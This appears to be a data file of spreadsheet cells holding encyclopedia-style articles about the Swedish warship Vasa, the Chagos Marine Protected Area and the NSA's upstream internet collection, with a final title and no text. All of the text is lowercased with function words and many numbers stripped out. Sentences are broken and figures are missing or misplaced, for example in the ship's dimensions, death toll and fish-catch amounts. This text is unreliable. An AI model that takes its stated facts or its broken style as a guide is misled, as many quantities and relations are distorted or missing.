jutland. swedish king little sympathy danish king, christian denmark sweden bitter enemies well century. however, sweden feared catholic conquest copenhagen zealand. this would granted catholic powers control strategic passages baltic north sea, would disastrous swedish interests.until early 17th century, swedish navy composed primarily small medium-sized ships single gundeck, normally armed 12-pounder smaller cannons; ships cheaper larger ships well-suited escort patrol. they also suited prevailing tactical thinking within navy, emphasized boarding decisive moment naval battle rather gunnery. king, keen artillerist, potential ships platforms, large, heavily armed ships made dramatic statement political theater naval power. beginning vasa, ordered series ships full gundecks, outfitted much heavier guns.five ships built vasa: äpplet ("the apple" kronan ("the crown"), scepter ("sceptre") göta ("ark gothenburg"), privy council cancelled orders others king's death 1632. these ships, especially kronan scepter, much successful served flagships swedish navy 1660s. second so-called regalskepp (usually translated "royal ships"), äpplet built simultaneously vasa. significant difference design vasa sister ship increase width meter (3.1 ft). construction just vasa ordered, dutch-born henrik hybertsson ("master henrik") shipwright stockholm shipyard. january 1625, master henrik business partner arendt groote signed contract build four ships, keel around feet smaller ones feet m).master henrik arendt groote began buying materials needed first ships 1625, purchasing timber individual estates sweden well buying rough-sawn planking riga, königsberg (modern kaliningrad), amsterdam. prepared begin first ships autumn 1625, henrik corresponded king vice admiral klas fleming ship build first. loss ships riga king propose building ships new, medium size quick compromise, sent specification this, ship would feet (35.6 long keel. henrik declined, since already timber large small ship. laid keel larger ship late february early march 1626. master henrik never vasa completed; fell late 1625, summer 1626 handed supervision work yard another dutch shipwright, henrik "hein" jacobsson. died spring 1627, probably time ship launched. after launching, work continued finishing upper deck, sterncastle, beakhead rigging. sweden still developed sizeable sailcloth industry, material ordered abroad. contract maintenance rigging, french sailcloth specified, cloth sails vasa likely came holland. sails made mostly hemp partly flax. rigging made entirely hemp imported latvia riga. king visited shipyard january 1628 made probably visit aboard ship. summer 1628, captain responsible supervising construction ship, söfring hansson, arranged ship's stability demonstrated vice admiral fleming, recently arrived stockholm prussia. thirty back forth across upper deck start ship rolling, admiral stopped test made three trips, feared ship would capsize. according testimony ship's master, göran mattson, fleming remarked wished king home. gustavus adolphus sending steady stream letters insisting ship soon possible.there much speculation whether vasa lengthened construction whether additional deck added late build. little evidence suggests vasa substantially modified keel laid. ships contemporary vasa elongated half timbers spliced existing sections, making addition readily identifiable, addition identified hull, evidence late additions second gundeck.the king ordered seventy-two 24-pound guns ship august 1626, many single deck. since king's order issued less five months construction started, would come early enough second deck included design. french galion guise, ship used model vasa, according arendt groote, also decks. laser measurements vasa's structure conducted 2007–2011 confirmed major changes implemented construction, centre gravity high.vasa early example warship full decks, built theoretical principles shipbuilding still poorly understood. there evidence henrik hybertsson ever built ship like before, gundecks much complicated compromise seaworthiness firepower single gundeck. safety margins time also anything would acceptable today. combined fact 17th-century warships built intentionally high superstructures used firing platforms), made vasa risky undertaking. henrik hybertsson died 1627, ship finished, contract taken widow margareta nilsdotter. armament vasa built time transition naval tactics, boarding still primary ways fighting enemy ships strictly organized ship-of-the-line focus victory superior gunnery. vasa armed powerful guns built high stern, would firing platform boarding actions soldiers supposed carry, high-sided hull narrow upper deck optimized boarding. neither largest ship ever built, carrying greatest number guns. what made arguably powerful warship time combined weight shot could fired cannons side: pounds (267 kg), excluding stormstycken, guns used firing anti-personnel ammunition instead solid shot. this largest concentration artillery single warship baltic time, perhaps northern europe, 1630s ship firepower built. this large amount naval artillery placed ship quite small relative armament carried. comparison, constitution, frigate built united states years vasa, roughly firepower, tonnes (1.5 million pounds) heavier.the constitution, however, belonged later naval warfare employed line battle-tactic, ships fought single file line ahead) group whole attempted present batteries side toward enemy. guns would aimed direction fire could concentrated single target. 17th century, tactics involving organized formations large fleets still developed. rather, ships would fight individually small improvised groups, focused boarding. vasa, though possessing formidable battery, built tactics mind, therefore lacked unified broadside guns aimed roughly direction. rather, guns intended fired independently arranged according curvature hull, meaning ship would bristled artillery directions, covering virtually angles.naval gunnery 17th century still infancy. guns expensive much longer lifespan warship. guns lifetime century unheard warships would used years. sweden many european countries, ship would normally "own" guns, would issued armament armory every campaign season. ships therefore usually fitted guns diverse size. what allowed vasa carry much firepower merely unusually large number guns crammed relatively small ship, also main 24-pounder guns standardized lightweight design. these cast single series state foundry stockholm, direction swiss-born founder medardus gessus. additional 24-pounders, heavier older design, mounted bows, so-called chasers. four heavy guns intended stern, cannon foundry could cast guns fast navy yard could build ships, vasa waited nearly year construction finished armament. when ship sailed august 1628, eight planned armament guns still delivered. cannons time made individually made moulds could reused, vasa's guns uniform precision manufacturing primary dimensions varied millimeters, bores almost exactly (5.7 in). remaining armament vasa consisted eight 3-pounders, large caliber stormstycken (similar english called howitzers) boarding actions, 1-pound falconets. also included board kilograms (1,970 gunpowder 1,000 shot various types guns. ornamentation custom warships time, vasa decorated sculptures intended glorify authority, wisdom martial prowess monarch also deride, taunt intimidate enemy. sculptures made considerable part effort cost building ship. symbolism used decorating ship mostly based renaissance idealization roman greek antiquity, imported italy german dutch artists. imagery borrowed mediterranean antiquity dominates motifs, also include figures testament even ancient egypt. many figures dutch grotesque style, depicting fantastic frightening creatures, including mermaids, wild men, monsters tritons. decoration inside ship much sparser largely confined steerage great cabin, upper gundeck. residues paint found many sculptures parts ship. entire ornamentation painted vivid colors. sides beakhead (the protruding structure bowsprit), bulwarks (the protective railing around weather deck), roofs quarter galleries, background transom (the flat surface stern ship) painted red, sculptures decorated bright colors, dazzling effect places emphasized gold leaf. previously, believed background color blue sculptures almost entirely gilded, reflected many paintings vasa 1970s early 1990s, lively dramatic drawings björn landström painting francis smitheman. late 1990s, view revised colors properly reflected recent reproductions ship's decoration maritime painter thompson 1:10 scale model museum. vasa example much heavily gilded sculptures early baroque rather "the last gasps medieval sculpture tradition" fondness gaudy colors, style today would considered extravagant even vulgar. sculptures carved oak, pine linden, many larger pieces, like huge 3-meter long figurehead lion, consist several parts carved individually fitted together bolts. close sculptures, concentrated high stern galleries beakhead, found ship. figure hercules appears pair pendants, younger older, side lower stern galleries; pendants depict opposite aspects ancient hero, extremely popular antiquity well 17th-century european art. transom biblical nationalistic symbols images. particularly popular motif lion, found mascarons originally fitted insides gunport doors, grasping royal coat arms either side, figurehead, even clinging rudder. each side beakhead originally figures (though actually found) depicted roman emperors tiberius septimius severus.overall, almost heroic positive imagery directly indirectly identified king originally intended glorify wise powerful ruler. actual portrait king located transom stern. here depicted young long, flowing hair, crowned griffins representing king's father, charles team least expert sculptors worked minimum years sculptures, likely assistance unknown number apprentices assistants. direct credit sculptures provided, distinct style senior artists, mårten redtmer, clearly identifiable. other accomplished artists, like hans clausink, johan didrichson tijsen thessen swedish) possibly marcus ledens, known employed extensive work naval yards time vasa built, respective styles distinct enough associate directly specific sculptures.the artistic quality sculptures varies considerably, four distinct styles identified. artist positively associated various sculptures mårten redtmer, whose style described "powerful, lively naturalistic". responsible considerable number sculptures. these include important prestigious pieces: figurehead lion, royal coat arms, sculpture king transom. styles described "elegant little stereotyped manneristic", "heavy, leisurely nevertheless rich lively style", respectively. fourth last style, deemed clearly inferior three, described "stiff ungainly" done carvers, perhaps even apprentices, lesser skill. maiden voyage august 1628, captain söfring hansson ordered vasa depart maiden voyage naval station älvsnabben. calm, wind light breeze southwest. ship warped (hauled anchor) along eastern waterfront city southern side harbor, four sails set, ship made east. ports open, guns fire salute ship left stockholm.as vasa passed bluffs south (now called södermalm), gust wind filled sails, heeled suddenly port. sheets cast off, ship slowly righted gust passed. tegelviken, bluffs, even stronger gust forced ship onto port side, time pushing open lower gunports surface, allowing water rush onto lower gundeck. water building deck quickly exceeded ship's minimal ability right itself, water continued pour hold. ship swiftly sank depth (105 (390 shore. survivors clung debris upper masts, still surface. many nearby boats rushed aid, despite efforts short distance land, people reportedly perished ship. vasa sank full view crowd hundreds, thousands, mostly ordinary stockholmers come ship sail. crowd included foreign ambassadors, effect spies gustavus adolphus' allies enemies, also witnessed catastrophe. inquest council sent letter king loss, telling sinking, took weeks reach poland. "imprudence negligence" must cause, wrote angrily reply, demanding uncertain terms guilty parties punished. captain söfring hansson, survived disaster, immediately taken questioning. under initial interrogation, swore guns properly secured crew sober.a full inquest tribunal members privy council admiralty took place royal palace september 1628. each surviving officers questioned supervising shipwright number expert witnesses. also present inquest admiral realm, carl carlsson gyllenhielm. object inquest much find scapegoat find ship sunk. whoever committee might find guilty fiasco would face severe penalty.surviving crew members questioned handling ship time disaster. rigged properly wind? crew sober? ballast properly stowed? were guns properly secured? however, prepared take blame. crewmen contractors formed camps; tried blame other, everyone swore done duty without fault inquest details stability demonstration revealed.next, attention directed shipbuilders. "why build ship narrow, badly without enough bottom capsized?" prosecutor asked shipwright jacobsson. jacobsson stated built ship directed henrik hybertsson (the original shipbuilder, recently deceased), turn followed specification approved king. jacobsson fact widened ship foot inches taking responsibility construction, construction ship advanced allow widening.in end, guilty party could found. answer arendt groote gave asked court ship sank "only knows". gustavus adolphus approved measurements armaments, ship built according instructions loaded number guns specified. end, punished found guilty negligence, blame effectively fell dead henrik hybertsson. vasa wreck less three days disaster, contract signed ship raised. however, efforts unsuccessful. earliest attempts raising vasa english engineer bulmer, resulted righting ship also securely stuck mud, biggest impediments earliest attempts recovery. salvaging technology early 17th century much primitive today, recovery ships used roughly principles used raise vasa years later. ships hulks placed parallel either side wreck, ropes attached several anchors sent hooked ship. hulks filled much water safe, ropes tightened, water pumped out. sunken ship rose ships surface could towed shallower waters. process repeated entire ship successfully raised water level. even underwater weight vasa great, settled made securely bottom required considerable lifting power overcome.more years ship's sinking, 1663–1665, albreckt treileben andreas peckell mounted effort recover valuable guns. with simple diving bell, team swedish finnish divers retrieved them. such activity waned became clear ship could raised technology time. however, vasa fall completely obscurity recovery guns. ship mentioned several histories sweden swedish navy, location wreck appeared harbor charts stockholm 19th century. 1844, navy officer anton ludwig fahnehjelm turned request salvaging rights ship, claiming located fahnehjelm inventor designed early form light diving suit previously involved salvage operations. there dives made wreck 1895–1896, commercial salvage company applied permit raise salvage wreck 1920, turned down. 1999, witness also claimed father, petty officer swedish navy, taken part diving exercises vasa years world deterioration years vasa bottom stockholm harbor (called stockholms ström, "the stream", swedish), ship contents subject several destructive forces, first among decomposition erosion. among first things decompose thousands iron bolts held beakhead much sterncastle together, included ship's wooden sculptures. almost iron ship rusted away within years sinking, large objects, anchors, items made cast iron, cannonballs, survived.organic materials fared better anaerobic conditions, wood, cloth leather often good condition, objects exposed currents eroded sediment water, barely recognizable. objects fell hull nails corroded well protected, many sculptures still retain areas paint gilding. human remains, soft tissue quickly consumed bacteria, fish crustaceans, leaving bones, often held together clothing, although case, hair, nails brain tissue survived.the parts hull held together joinery wooden treenails remained intact much centuries, suffering gradual erosion surfaces exposed water, unless disturbed outside forces. eventually entire sterncastle, high, portion ship housed officers' quarters held transom, gradually collapsed decorative sculptures. quarter galleries, merely nailed sides sterncastle, collapsed fairly quickly found lying almost directly original locations.human activity destructive factor, initial salvage efforts, recovery guns, final salvage 20th century left marks. peckell treileben broke removed much planking weather deck cannons decks below. peckell reported recovered cartloads wood ship; might included planking structural details also sculptures today missing, life-size roman warrior near sculpture septimius severus adorned port side beakhead.since vasa busy shipping channel, ships occasionally dropped anchor her, large anchor demolished upper sterncastle, probably 19th century. construction work stockholm harbor usually entails blasting bedrock, resulting tonnes rubble often dumped harbor; landed ship, causing damage stern upper deck. vasa rediscovered early 1950s, amateur archaeologist anders franzén considered possibility recovering wrecks cold brackish waters baltic because, reasoned, free shipworm teredo navalis, usually destroys submerged wood rapidly warmer, saltier seas. franzén previously successful locating wrecks riksäpplet lybska svan, long tedious research began looking vasa well. spent many years probing waters without success around many assumed locations wreckage. succeed until, based accounts unknown topographical anomaly south gustav dock beckholmen, narrowed search.in 1956, home-made, gravity-powered coring probe, located large wooden object almost parallel mouth dock beckholmen. location ship received considerable attention, even identification ship could determined without closer investigation. soon announcement find, planning underway determine excavate raise vasa. swedish navy involved start, various museums national heritage board, representatives eventually formed vasa committee, predecessor vasa board. recovery number possible recovery methods proposed, including filling ship ping-pong balls freezing block ice, method chosen vasa board (which succeeded vasa committee) essentially attempted immediately sinking. divers spent years digging tunnels ship steel cable slings, taken pair lifting pontoons surface. work ship extremely dangerous, requiring divers tunnels clay high-pressure water jets suck resulting slurry dredge, working total darkness hundreds tonnes mud-filled ship overhead. persisting risk wreck could shift settle deeper diver working tunnel, trapping underneath wreckage. almost vertical sections tunnels near side hull could also potentially collapse bury diver inside. despite dangerous conditions, 1,300 dives made salvage operation without serious accidents.each time pontoons pumped full, cables tightened pontoons pumped out, ship brought meter closer surface. series lifts august september 1959, ship moved depth meters (105 meters sheltered area kastellholmsviken, divers could work safely prepare final lift. over course year half, small team commercial divers cleared debris upper decks lighten ship, made hull watertight possible. ports closed means temporary lids, temporary replacement collapsed sterncastle constructed, many holes iron bolts rusted away plugged. final lift began april 1961, morning april, vasa ready return world first time years. press world, television cameras, invited guests barges boats, thousands spectators shore watched first timbers broke surface. ship emptied water towed gustav dock beckholmen, ship floated keel onto concrete pontoon, hull still stands.from 1961 december 1988, vasa housed temporary facility called wasavarvet ("the vasa shipyard"), included exhibit space well activities centred ship. building erected ship pontoon, cramped, making conservation work awkward. visitors could view ship levels, maximum viewing distance places couple meters, made difficult viewers overall view ship. 1981, swedish government decided permanent building constructed, design competition organized. winning design, swedish architects månsson dahlbäck, called large hall ship polygonal, industrial style. ground broken 1987, vasa towed half-finished vasa museum december 1988. museum officially opened public 1990. archaeology vasa posed unprecedented challenge archaeologists. never four-storey structure, original contents largely undisturbed, available excavation. conditions team work added difficulties. ship kept order crack could properly conserved. digging performed constant drizzle water sludge-covered could metre deep.in order establish find locations, hull divided several sections demarcated many structural beams, decking line drawn along centre ship stern bow. part, decks excavated individually, though times work progressed deck level simultaneously. finds vasa four preserved decks: upper lower decks, hold orlop. because constraints preparing ship conservation, archaeologists work quickly, 13-hour shifts first week excavation. upper deck greatly disturbed various salvage projects 1628 1961, contained material fallen rigging upper deck, also three centuries harbor refuse.the decks progressively less disturbed. gundecks contained carriages, three surviving cannons, objects military nature, also personal possessions sailors stored time sinking. these included wide range loose finds, well chests casks spare clothing shoes, tools materials mending, money form low-denomination copper coins), privately purchased provisions, everyday objects needed life sea.most finds wood, testifying simple life board, generally unsophisticated state swedish material culture early 17th century. lower decks primarily used storage, hold filled barrels provisions gunpowder, coils anchor cable, iron shot guns, personal possessions officers. orlop deck, small compartment contained ship's sails, rigging spares, working parts ship's pumps. another compartment contained possessions ship's carpenter, including large tool chest.after ship salvaged excavated, site loss excavated thoroughly 1963–1967. this produced many items rigging tackle well structural timbers fallen off, particularly beakhead sterncastle. most sculptures decorated exterior hull also found mud, along ship's anchors skeletons least four people. last object brought nearly 12-metre-long longboat, called esping swedish, found lying parallel ship believed towed vasa sank.many recent objects contaminating site disregarded finds registered, remains 1660s salvage efforts others stories tell. among best known statue 20th-century finnish runner paavo nurmi, placed ship prank students helsinki university technology (now known aalto university) night final lift. inspiration prank sweden forbidden nurmi competing 1932 summer olympics angeles, united states. causes sinking vasa sank little initial stability, thought resistance heeling force wind waves acting hull. reason distribution mass hull structure ballast, guns, provisions, objects loaded board puts much weight high ship. centre gravity high, takes little force make ship heel over, enough righting moment, force trying make ship return upright position. reason ship high centre gravity guns. these weighed little tonnes (130 thousand pounds), total displacement loaded ship. this relatively weight bearable ship size. problem hull construction itself. part hull waterline high heavily built relation amount hull water. headroom decks higher necessary crewmen were, average, 1.67 meters feet inches) tall, thus weight decks guns carry higher waterline needed. addition, deck beams supporting timbers over-dimensioned closely spaced loads carry, contribute much weight already tall heavy upper works.the different measuring systems either side vessel caused mass distributed asymmetrically, heavier port. during construction swedish feet amsterdam feet different teams. archaeologists found four rulers used workmen built ship. calibrated swedish feet, inches, measured amsterdam feet, inches.although mathematical tools calculating predicting stability still century future, 17th-century scientific ideas ships behaved water deeply flawed, people associated building sailing ships swedish navy much aware forces work relationships other. last part inquest held sinking, group master shipwrights senior naval officers asked opinions ship sank. their discussion conclusions show clearly knew happened, verdict summed clearly captains, said ship enough "belly" carry heavy upperworks.common practice time dictated heavy guns placed lower deck decrease weight upper deck improve stability. armament plans changed many times build either 24-pounders lower deck along lighter 12-pounders upper deck 24-pounders decks. ports upper deck correct size 12-pounders, ship finished heavy 24-pounders decks, contributed poor stability.vasa might sunk august 1628, ship sailed gunports closed. ships multiple tiers gunports normally sail lowest tier closed, since pressure wind sails would usually push hull lower gunport sills water. reason, gunport lids made double designed seal well enough keep water. captain söfring hansson ordered lower gundeck ports closed ship began take water, late. done sailed, vasa might sunk day. conservation although vasa surprisingly good condition years bottom sea, would quickly deteriorated hull simply allowed dry. large bulk vasa, cubic meters (21,000 timber, constituted unprecedented conservation problem. after debate best preserve ship, conservation carried impregnation polyethylene glycol (peg), method since become standard treatment large, waterlogged wooden objects, 16th-century english ship mary rose. vasa sprayed years, followed long period slow drying, entirely complete.the reason vasa well-preserved shipworm normally devours wooden ships absent also water stockholms ström heavily polluted late 20th century. highly toxic hostile environment meant even toughest microorganisms break wood difficulty surviving. this, along fact vasa newly built undamaged sank, contributed conservation. however, properties water also negative effect. chemicals present water around vasa penetrated wood, timber full corrosion products bolts iron objects disappeared. once ship exposed air, reactions began inside timber produced acidic compounds. late 1990s, spots white yellow residue noticed vasa associated artefacts. these turned sulfate-containing salts formed surface wood sulfides reacted atmospheric oxygen. salts surface vasa objects found around threat (even discoloring distracting), inside wood, expand crack timber inside. 2002, amount sulfuric acid vasa's hull estimated tonnes (4,400 lb), continually created. enough sulfides present ship produce another 5,000 kilograms (11,000 acid rate kilograms (220 year; might eventually destroy ship almost entirely.while scientific community considers destructive substance responsible vasa's long-term decay sulfuric acid, ulla westermark, professor wood technology luleå university technology, proposed another mechanism colleague börje stenberg. experiments done japanese researchers show treating wood acidic environment generate formic acid eventually liquify wood. vasa exposed acidic water three centuries, therefore relatively samples taken ship indicate formic acid present, could multiple causes suddenly accelerated rate decomposition. museum constantly monitoring ship damage caused decay warping wood. ongoing research seeks best preserve ship future generations analyze existing material closely possible. current problem ship built lost substantial amount original strength cradle supports ship match well distribution weight stress hull. "the amount movement hull worrying. nothing done, ship likely capsize again", states magnus olofson vasa museum. effort secure vasa future way, cooperation royal institute technology institutions around globe.to deal problem inevitable deterioration ship, main hall vasa museum kept temperature 18–20 (64–68 humidity level 53%. slow destruction acidic compounds, different methods tried. small objects sealed plastic containers filled inert atmosphere nitrogen gas, halting reactions sulfides oxygen. ship treated cloth saturated basic liquid neutralize temporary solution acid continuously produced. original bolts rusted away ship sank replaced modern ones galvanized covered epoxy resin. despite this, newer bolts also started rust releasing iron wood, accelerated deterioration. legacy vasa become popular widely recognized symbol historical narrative swedish stormaktstiden ("the great power-period") 17th century, early development european nation state. within disciplines history maritime archaeology wrecks large warships 16th, 17th 18th centuries recei</t>
  </si>
  <si>
    <t>Chagos Marine Protected Area</t>
  </si>
  <si>
    <t>chagos marine protected area, located central indian ocean british indian ocean territory united kingdom, world's largest marine protected areas, largest protected areas type (land sea) earth. established british government april 2010 massive, contiguous, no-take marine reserve, encompasses 640,000 square kilometres (250,000 ocean waters, including roughly small islands seven atolls chagos archipelago. establishment protected area immediately controversial, largest island area, diego garcia, forcibly depopulated make united states military base 1968 onwards, action described "ethnic cleansing". cable leaked wikileaks, state department official commented based talks british ministers officials establishing reserve restrict fishing would "most effective long-term prevent chagos islands' former inhabitants descendants resettling." cable explained protection would permit environmental damage caused military use: "the terms reference establishment marine park would clearly state biot, including diego garcia, reserved military uses. establishment marine reserve potential 'win-win situation terms establishing situational awareness' biot... [the government] sought constraints military operations' result establishment marine park." exemption allows people base diego garcia continue fishing. 2010, tonnes fish caught personnel base.on march 2015, permanent court arbitration unanimously held establishment marine protected area (mpa) illegal united nations convention sea, mauritius legally binding rights fish waters surrounding chagos archipelago, eventual return chagos archipelago, preservation minerals discovered near chagos archipelago prior return. decision court final binding. negotiation government government mauritius.the cmpa administered assistance chagos trust, funded donations british government. tourist visitors generally permitted, although 2016 private yachts sailing across indian ocean apply mooring permits outside strict nature reserve areas. description chagos marine reserve protects world's largest coral atoll (the great chagos bank) healthiest reef systems cleanest waters world, supporting nearly half area good quality reefs indian ocean. no-take marine reserves areas fishing allowed little human disturbance reasonably arranged. chagos archipelago tiny islands atolls located central indian ocean, 1,500 southern india, 3,400 east africa 3,000 west indonesia. politically, chagos constituted british indian ocean territory (biot). establishment previous establishment marine reserve, chagos archipelago declared environmental (preservation protection) zone legislation place protect much area's natural resources. commercial fishing, however, licensed reef fish tuna. though government opposed area proposed world heritage site, agreed treat order preserve environmental value.the case large scale marine reserve chagos first forward consortium conservation organisations chagos environment network, collaboration nine leading scientific conservation organisations, "the chagos archipelago: nature future" launched march 2009. chagos environment network leading advocate reserve consultation period organised major petitions favour reserve up.from november 2009 march 2010, public consultation carried government take views whether marine protected area (mpa) established archipelago. respondents asked whether believed established also degree thought protected, either establish fully no-take marine reserve less protected marine protected area would allow fishing.the response consultation high, 250,000 people expressing views issue either petitions lengthy written replies. over declared support greater marine protection, majority believing no-take marine reserve. loss approximately £800,000 year earned tuna licensing frequently raised possible hurdle designation marine reserve. final months leading designation, bertarelli foundation offered fill funding left absence fisheries income thereby contribute costs enforcement boat period five years. following response, total area chagos’ exclusive economic zone declared fully no-take area, exception 3-mile zone around island diego garcia.the british foreign secretary instructed biot commissioner establish marine protected area april 2010, essentially last could dissolution parliament prior 2010 british general election.the chagos mpa's establishment first five years protection supported major funding bertarelli foundation. ecology biodiversity ninety percent united kingdom's biodiversity lies overseas territories, chagos archipelago biodiverse marine area united kingdom's waters. habitats include extensive shallow limestone reefs associated environments, seamounts deep trench underwater canyon 4,900 (16,000 deep. coral unusual aspects chagos marine environment extremely healthy diverse coral cover, dense even deep water steep outer slopes reefs. area hosts species coral including ctenella chagius, variety brain coral believed endemic atoll, staghorn coral important protecting low-lying islands wave erosion. chagos provides important benchmark coral conservation, 'natural laboratory' study functioning wonderfully complex ecosystems. fish fish region equally diverse, least different species identified including chagos clownfish (amphiprion chagosensis) endemic archipelago. strictly no-take chagos marine reserve freed chagos' fish populations fishing pressure within reserve's boundaries. marine reserve important refuge overfished pelagic species manta rays, sharks including whale sharks, tuna particular importance globally threatened species, silky shark. also believed, based results research similar deep water diverse underwater terrain parts world, deep water trench likely harbour variety previously undiscovered species. turtles islands archipelago provide vital nesting sites green hawksbill turtles (chelonia mydas eretmochelys imbricata). since hawksbill turtle labelled ‘critically endangered’ green turtle ‘endangered’ iucn list, chagos populations considered international importance. estimated 300-700 hawksbill 400-800 green turtles nest annually across islands archipelago. mammals environments chagos archipelago provides rich biodiversity support varieties cetacean species within vicinity, three populations blue whales toothed whales (such sperm, pilot, orca, pseudo-orca, risso's dolphins spinners). regional extinct dugongs historically seen archipelago, hence island named presences species. birds breeding seabirds chagos considered international importance. archipelago harbours eighteen different species breeding birds islands designated important bird areas (ibas) birdlife international, making region diverse breeding seabird community tropical region, though presence human-introduced rats several islands severely hinder seabird nesting these. five species considered breeding internationally significant numbers: sooty tern (sterna fuscata); brown lesser noddy (anous stolidus anous tenuirostris); red-footed booby (sula sula) wedge-tailed shearwater (puffinus pacificus). coconut crabs world's largest terrestrial arthropod, coconut crab (birgus latro) abundant islands chagos archipelago, overall density conservation area diego garcia crabs hectare highest ever recorded. long distances larvae coconut crab travel, chagos population considered important replenishing numbers areas indian ocean. scientific research scientific conservation efforts undertaken tell islands, remove invasive plant animal species, restore native vegetation. these initiatives important contribution conservation chagos, global biodiversity. february march 2013, research expedition undertaken chagos marine protected area (mpa). expedition, sponsored bertarelli foundation, partnership stanford university university western australia, piloted electronic tagging project examine feasibility using remote technologies monitor movement important pelagic species region. five different types electronic tags deployed study, total electronic tags placed animals, along installation acoustic receiver array around northern atolls detect animal movements. pollution according report scientific adviser foreign commonwealth office, british government refused disclose, suggests pacific marlin, ageing hired london used patrol british indian ocean territories, discharging waste docked waters shared navy vessels. independent also revealed american ships pouring waste including treated human sewage three decades lagoon diego garcia, served strategic base since 1970s. mauritian opposition marine protected area condemned mauritius, owned chagos islands detached colony granted independence, remained british control ever since. government mauritius initiated proceedings december 2010 government united nations convention (unclos) challenge legality marine protected area. mauritius considers "coastal state" unclos international law, authority purport establish marine protected area around chagos archipelago compatible rights chagossians.the original chagossians deported largest island, diego garcia, years earlier make naval support facility diego garcia, port facilities airstrip capable handling largest aircraft force. chagossians would effect barred ever returning marine protection zone would stop fishing, main livelihood. "there would natural injustice. fish would rights conservation groups fallen trap. they used government prevent returning," said roch evenor, secretary chagos support association. greenpeace letter greenpeace, mauritian lalit klas political party said "the british government's plan marine protected area grotesquely transparent ruse designed perpetuate banning people mauritius chagos part country," 2012, greenpeace ship rainbow warrior indian ocean region government mauritius initially blocked making scheduled stopover port-louis harbour. reason refusal unconditional support greenpeace given british authorities controversial project protected marine park chagos archipelago. mauritius officially denounced "hypocritical" position greenpeace matter deeply regrets greenpeace international chose close eyes illegal excision chagos archipelago despite recognised part mauritius various international groups. mauritius insisted greenpeace, claims fighting environmental protection, showed hypocritical attitude remaining silent proposed construction marine park.thus, official correspondence, greenpeace international said outset that: support marine protected area was, remains, subject clear proviso without prejudice rights chagossians sovereignty claim mauritius. nothing taken greenpeace implicitly condoning existence diego garcia military base. greenpeace always clear unequivocal government committed terrible historic wrong chagossians. fully support struggle right return home close dialogue representatives community, chagos refugees group. wikileaks december 2010, wikileaks released leaked embassy london diplomatic cable dating back 2009 exposing british calculations creating marine nature reserve. cable relays exchanges political counselor richard mills british director foreign commonwealth office colin roberts, roberts "asserted establishing marine park would, effect, paid resettlement claims archipelago’s former residents." richard mills concludes: establishing marine reserve might, indeed, fco's roberts stated, effective long-term prevent chagos islands' former inhabitants descendants resettling british indian ocean territory. cable records roberts' assertion marine reserve proposed charitable trust, classified confidential foreigners", leaked part cablegate cache. cable explained protection would permit environmental damage caused military use: "the terms reference establishment marine park would clearly state biot, including diego garcia, reserved military uses. establishment marine reserve potential 'win-win situation terms establishing situational awareness' biot. [the government] sought constraints military operations' result establishment marine park." exemption allows fishing continue supply food military base; 2010, kilograms (165 fish caught daily consumption 3,200 personnel base. chagos marine protected area declared illegal after permanent court arbitration decision, prime minister mauritius pointed first time uk's conduct regard chagos archipelago considered condemned international court tribunal. qualified ruling important milestone relentless struggle, political, diplomatic levels, successive governments years effective exercise mauritius sovereignty chagos archipelago. tribunal considered detail undertakings given united kingdom mauritian ministers lancaster house talks september 1965. argued undertakings binding status international law. tribunal firmly rejected argument, holding undertakings became binding international agreement upon independence mauritius, bound ever since. found uk's commitments towards mauritius relation fishing rights mineral rights chagos archipelago legally binding. exclusion chagossian peoples chagos designated 2010, legal deliberation whether natives chagos would able return island forty years exile. return, able fish subsistence mpa's status strict no-take reserve. despite this, fishing allowed around atoll diego garcia, island joint uk-us military base located. diego garcia, current pollution source archipelago, exempt purpose maintaining military operations. establishment chagos sustains injustice prior removal indigenous chagossians represents ignoring pursuits return home. even though rights archipelago disputed, sovereignty chagos clearly rests complete control access withdrawal resources islands. also mauritius united kingdom references external links chagos conservation trust chagos country profile foreign commonwealth office website bertarelli foundation chagos page zoological society london's chagos pages</t>
  </si>
  <si>
    <t>Upstream collection</t>
  </si>
  <si>
    <t>upstream collection term used national security agency (nsa) united states intercepting telephone internet traffic internet backbone, i.e. major internet cables switches, domestic foreign. besides upstream collection, also gathers information internet communications arrangements internet companies program codenamed prism. both upstream programs prism part special source operations (sso) division, responsible collection cooperation corporate partners. programs slides presentation prism-program describes upstream "collection communications fiber cables infrastructure data flows past" says upstream collection conducted following four major surveillance programs: fairview blarney stormbrew oakstarthe fairview, blarney stormbrew programs collecting data facilities united states, whereas oakstar umbrella eight different programs used collection outside under four programs, collection takes place cooperation commercial telecommunication companies, inside outside us.upstream collection programs allow access high volumes data. according anonymous official speaking wall street journal reporter, first, pre-selection done telecommunication providers themselves, select traffic (including text emails audio telephone calls) likely contains foreign communications. then data passed nsa, second selection made briefly copying traffic filtering using so-called "strong selectors" like phone numbers, e-mail addresses people organizations interested. however, william binney, former high-ranking official whistleblower, publicly maintains seeks "collect all" minimal filtering. internet data collected upstream programs processed searched xkeyscore indexing analysing system. operational details according former current government officials, dozen major based internet switching stations kind filtering takes place, near sites main undersea internet cables enter actual example facility taps internet backbone cables room 641a francisco switching station at&amp;t, revealed 2006. devices used filter internet traffic semantic traffic analyzer 6400 made boeing subsidiary narus. collection data internet cables switches outside united states, also secret agreements foreign internet providers, especially europe middle east. costs cooperation made companies paid corporate partner access program, like expenses american telecommunication companies. total costs program estimated million dollar fiscal year 2013.upstream collection conducted four different legal authorizations: 12333 transit fisa faain foreign intelligence surveillance court (fisc) order october 2011, said upstream collection accounts approximately total number million internet communications collects authority section every year. during first half 2011, acquired 13.25 million internet communications upstream collection. although relatively small amount, order says upstream collection significant contains certain types valuable foreign intelligence information, still involves collection millions internet communications year, impossible exclude domestic communications collected technical difficulties. legal claims march 2015, american civil liberties union sued united states department justice national security agency (nsa) massive online surveillance, claiming "the surveillance exceeds scope authority congress provided fisa amendments 2008 (“faa”) violates first fourth amendments." lawsuit heard, like previous analogue complaints, first debate postponed october lack standing. decision appealed wikimedia foundation leaded eight organizations.as february 2020, legal case concluded. related media also mass surveillance targeted surveillance global surveillance disclosures (2013–present) references external links level telecommunications: slides nsa's upstream collection</t>
  </si>
  <si>
    <t>Chain of trust</t>
  </si>
  <si>
